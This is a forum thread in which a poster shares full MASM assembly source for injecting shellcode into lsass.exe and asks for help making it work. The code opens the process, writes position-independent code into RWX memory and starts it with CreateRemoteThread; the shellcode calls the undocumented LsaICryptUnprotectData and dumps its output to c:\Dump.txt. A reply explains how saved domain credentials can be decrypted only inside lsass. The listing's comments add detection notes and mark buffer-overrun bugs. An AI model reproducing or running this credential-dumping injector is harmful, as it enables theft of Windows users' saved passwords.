
    Injecting Into Lsass for Cryted Data

    Code:
            .386
            .model flat,stdcall
            option casemap:none
            include \masm32\include\windows.inc
            include \masm32\include\kernel32.inc
            include \masm32\include\user32.inc
            include \masm32\include\lsasrv.inc
            includelib \masm32\lib\kernel32.lib
            includelib \masm32\lib\user32.lib
            includelib \masm32\lib\lsasrv.lib
    
            .const
            ; Selector values for FindProcessByName's _returntype argument
            PROCESS_HANDLE equ 0                 ; return an OpenProcess handle
            PROCESS_ID equ 1                     ; return the bare process id
    
            .data
               szProcess              db 'lsass.exe',0        ; image name of the target process (the LSA subsystem)
               szKernel               db 'KERNEL32',0         ; used by start: to resolve GetProcAddress locally
               szGetProcAddress       db 'GetProcAddress',0   ; its address becomes the remote thread parameter
    
            .data?
               hProcess               dd ?        ; handle returned by FindProcessByName(PROCESS_HANDLE)
               lpInjected             dd ?        ; remote buffer returned by VirtualAllocEx
               lenInjected            dd ?        ; byte length of the Injected..EndInjected payload
               pInfo                  PROCESS_INFORMATION <>   ; not referenced anywhere in this listing
               sInfo                  STARTUPINFO <>           ; not referenced anywhere in this listing
    
               Injected PROTO:DWORD
            .code
    
    
    ;-----------------------------------------------------------------------
    ; Injected(lpGetProcAddress) -- the payload that start: copies into the
    ; target process and runs with CreateRemoteThread.
    ; Everything from Injected to EndInjected is copied as raw bytes, so the
    ; routine is written position independent: it receives the address of
    ; GetProcAddress as its only thread parameter, resolves every other API
    ; through it, and embeds each string inline with a call/pop pair.
    ; ABI:   stdcall, x86-32; the LOCALs give the routine an ebp frame
    ; In:    lpGetProcAddress = address of GetProcAddress in the target
    ; Out:   does not return normally -- ends in ExitThread(0)
    ; Stack[] is the table of resolved pointers, by dword offset:
    ;   +0  GetProcAddress        +4  module base found by the PEB walk
    ;   +8  LoadLibraryA          +12 lsasrv.dll base
    ;   +16 LsaICryptUnprotectData (undocumented lsasrv export)
    ;   +20 CreateFileA           +24 WriteFile        +28 ExitThread
    ; Detection note: a thread inside lsass.exe that loads lsasrv.dll, calls
    ; an undocumented export and then writes c:\Dump.txt is the textbook
    ; credential-dumping pattern; the RWX VirtualAllocEx / WriteProcessMemory
    ; / CreateRemoteThread sequence in start: is what process-injection
    ; telemetry keys on. LSA Protection (RunAsPPL) and Credential Guard are
    ; the platform controls that limit this class of access to lsass.
    ;-----------------------------------------------------------------------
    Injected PROC lpGetProcAddress:DWORD
           LOCAL Stack[20h]:dword           ; function-pointer table, see header
           LOCAL entropy[16]:byte           ; passed by address to the decrypt call
           LOCAL Buffer[100h]:byte          ; passed to the decrypt call, then dumped by WriteFile
           LOCAL cbSize:dword               ; passed by address to the decrypt call
           LOCAL BytesReturned:dword        ; WriteFile's lpNumberOfBytesWritten
           ASSUME fs:NOTHING
    
           ; Walk the process's loader module list from the PEB (fs:[30h])
           ; looking for a module whose base name is exactly 12 wide chars
           ; and starts with 'k'/'K' -- taken to be kernel32.dll.
           ; ebp is used as scratch in the loop, so the frame pointer that
           ; LOCAL set up is saved here and restored before any LOCAL is used.
           push ebp
           xor eax,eax                      ; eax = 0; al is the NUL compared below
           mov esi,fs:[eax+30h]
           mov esi,[esi+0Ch]
           mov esi,[esi+1Ch]
        next_module:
           mov ebp,[esi+08h]                ; candidate module base
           mov edi,[esi+20h]                ; its UTF-16 base name
           mov esi,[esi]                    ; advance to the next list entry
           cmp [edi+12*2],al                ; NUL after 12 wide chars?
           jne next_module
           cmp byte ptr[edi],6Bh            ; 'k'
           je find_kernel32_finished
           cmp byte ptr[edi],4Bh            ; 'K'
           je find_kernel32_finished
           jmp next_module
        find_kernel32_finished:
           mov ecx,ebp                      ; ecx = module base
           pop ebp                          ; frame pointer restored before touching LOCALs
           mov eax,lpGetProcAddress
           mov Stack,eax
           mov Stack+4,ecx
    
           ; call/pop idiom: the string bytes sit right after the call, so
           ; the pushed return address is the string's current address.
           call loc_1
              _szLoadLibraryA db "LoadLibraryA",0
           loc_1:
           pop ecx
           invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
           mov Stack+8,eax
    
           call loc_2
              _szlsasrv db "lsasrv.dll",0
           loc_2:
           pop ecx
           invoke (type LoadLibrary)ptr Stack+8,ecx
           mov Stack+12,eax
    
           call loc_3
              _szLsaICryptUnprotectData db "LsaICryptUnprotectData",0
           loc_3:
           pop ecx
           invoke (type GetProcAddress)ptr Stack,Stack+12,ecx
           mov Stack+16,eax
    
           ; Undocumented export; its parameters are not documented in this
           ; listing. NOTE(review): if 0FFFFh is an output size it exceeds
           ; the 100h-byte Buffer on the stack -- confirm against the prototype.
           invoke (type LsaICryptUnprotectData)ptr Stack+16, ADDR Buffer,0FFFFh, 0, 0, 0, 0, 20000041h, 0, ADDR entropy, ADDR cbSize 
    
           call loc_4
              _szCreateFileA db "CreateFileA",0
           loc_4:
           pop ecx
           invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
           mov Stack+20,eax
    
           call loc_5
              _szWriteFile db "WriteFile",0
           loc_5:
           pop ecx
           invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
           mov Stack+24,eax
                
           call loc_6
              _szExitThread db "ExitThread",0
           loc_6:
           pop ecx
           invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
           mov Stack+28,eax
    
           call loc_7
           FileName db "c:\Dump.txt", 0
           loc_7:
           pop ecx                          ; ecx = address of FileName
    
           ;BreakpointHere db 0cch
    
           ; share mode 7 = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE
           invoke (type CreateFileA)ptr Stack+20, ECX, GENERIC_WRITE, 7, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0 
           mov ecx, eax                     ; ecx = file handle (not checked for INVALID_HANDLE_VALUE)
           ; Writes 0FFFFh bytes starting at Buffer, which is only 100h bytes:
           ; the write reads far past the local buffer on the stack.
           invoke (type WriteFile)ptr Stack+24, ECX, ADDR Buffer, 0FFFFh, ADDR BytesReturned, 0 
           invoke (type ExitThread)ptr Stack+28, 0      
    
           ret                              ; not reached: ExitThread does not return
        Injected endp
        EndInjected:                        ; end marker; start: uses it to size the payload
    
    
    ;-----------------------------------------------------------------------
    ; FindProcessByName(_exename, _returntype)
    ; Walks a Toolhelp32 process snapshot and compares each entry's szExeFile
    ; with _exename (case-insensitive, lstrcmpi).
    ; In:    _exename    = NUL-terminated image name (e.g. szProcess)
    ;        _returntype = PROCESS_ID     -> eax = th32ProcessID of the match
    ;                      PROCESS_HANDLE -> eax = OpenProcess(PROCESS_ALL_ACCESS) on it
    ; Out:   eax as above. If the loop ends without a match, eax holds the
    ;        FALSE that terminated the loop and is still handed to OpenProcess
    ;        when _returntype == PROCESS_HANDLE.
    ; Preserves ebx, ecx, edx, esi, edi (uses clause); the snapshot handle
    ; is closed on every path.
    ; Detection note: OpenProcess with PROCESS_ALL_ACCESS on lsass.exe from
    ; an ordinary user-mode binary is a high-signal event by itself.
    ;-----------------------------------------------------------------------
    FindProcessByName proc uses ebx ecx edx esi edi _exename:dword,_returntype:dword
        LOCAL Process :PROCESSENTRY32
        lea esi,Process
        assume esi:ptr PROCESSENTRY32
        mov [esi].dwSize, sizeof PROCESSENTRY32 ; Process32First requires dwSize to be set
            invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
            mov edi,eax                         ; edi = snapshot handle
            invoke Process32First,edi,esi
            .while eax!=FALSE
            lea eax,[esi].szExeFile
            invoke lstrcmpi,eax,_exename
            .if eax==0
            ;---found process---
            mov eax,[esi].th32ProcessID
            jmp @return
            .endif
            invoke  Process32Next,edi,esi
            .endw
            @return:
            assume esi:nothing
            push eax                            ; keep the result across CloseHandle
            invoke CloseHandle,edi
            pop eax
            .if _returntype==PROCESS_HANDLE
            invoke OpenProcess,PROCESS_ALL_ACCESS,0,eax ;return hProcess
            .endif
        ret
    FindProcessByName endp
    
    ;-----------------------------------------------------------------------
    ; start -- program entry point (see 'end start').
    ;  1. sizes the Injected..EndInjected payload,
    ;  2. opens the process named by szProcess (lsass.exe) with all access,
    ;  3. allocates an RWX region there and copies the payload into it,
    ;  4. starts it with CreateRemoteThread, passing this process's address
    ;     of kernel32!GetProcAddress as the thread parameter -- presumably
    ;     relying on kernel32 being mapped at the same base in both processes.
    ; None of the API return values are checked.
    ; Detection note: VirtualAllocEx(PAGE_EXECUTE_READWRITE) followed by
    ; WriteProcessMemory and CreateRemoteThread against lsass.exe is the
    ; canonical process-injection / credential-access telemetry pattern.
    ;-----------------------------------------------------------------------
    start:
    
        
               ; Commented-out in-process test path: runs Injected directly
               ; instead of in the remote process.
               ;invoke GetModuleHandle,addr szKernel
               ;invoke GetProcAddress,eax,addr szGetProcAddress
               ;invoke Injected, EAX
               ;invoke ExitProcess,0
    
    
               mov ebx,EndInjected
               sub ebx,Injected
               mov lenInjected,ebx              ; lenInjected = EndInjected - Injected
    
               invoke FindProcessByName,ADDR szProcess,PROCESS_HANDLE
               mov hProcess, eax                ; not checked for failure
    
               invoke VirtualAllocEx,hProcess, 0, lenInjected, MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
               mov lpInjected,eax               ; remote payload address; not checked for NULL
    
               invoke WriteProcessMemory,hProcess,lpInjected,Injected,lenInjected,0
    
               invoke GetModuleHandle,addr szKernel
               invoke GetProcAddress,eax,addr szGetProcAddress
    
               ; eax = local GetProcAddress, passed as the thread parameter
               invoke CreateRemoteThread,hProcess,0,0,lpInjected,eax,0,0
    
               invoke ExitProcess,0
    
    end start
    I wrote a lot of this code from scratch and the rest from snippets.
    Everything here seems to work fine with calc.exe (which of course has no access to the encrypted data), but when I run it targeting Lsass.exe it does not execute correctly. Anyone have any idea on how this is done correctly?

    EDIT:
    I am guessing this is the issue =(
    http://mnin.blogspot.com/2007/05/inj...ged-win32.html
    Last edited by AgentSmithers; May 13th, 2011 at 01:09 AM.
    Http://ControllingTheInter.Net
    My General Computer Forum, From Security To Programming And Back To Troubleshooting.


    Re: Injecting Into Lsass for Cryted Data

    Okay, I'm getting really warm. I guess now I need to enumerate the SIDs of the users I want to extract, then call the decrypt API.

    AS Quoted

    I guess I aught to answer this question myself since I've now spent ages working out how to do this and I'm not sure it's widely known. CredEnumerate/CredRead will never provide password information for domain passwords no matter what process context you're in or what token you have despite what it seems to hint at on MSDN. The only way to get access to the saved credential information is to do so using the undocumented function LSAICryptUnprotectData() which is in lsasrv.dll. This can decrypt the files you find in %APPDATA%\Microsoft\Credentials and can provide an identical data structure to CredEnumerate except with the password filled in. The only catch is that this must be done in the process context of lsass.exe (The windows security subsystem), no setting of privilledges etc is enough to give a normal process the rights to do this. If you're a hacker you can do this by performing a CreateRemoteThread() to inject a thread into lsass.exe or if you're trying to do this in a legitimate way, i.e you're extending the Windows operating system in some way for a third party application, like I was, you can do this by creating a Windows authentication package which lsass will load. This AP can then use a named pipe or some such method to allow interaction with the rest of your code.
    I'm getting warm; it looks like my code is half done. I need to extract the SIDs, then target the encrypted file.
    Http://ControllingTheInter.Net
    My General Computer Forum, From Security To Programming And Back To Troubleshooting.





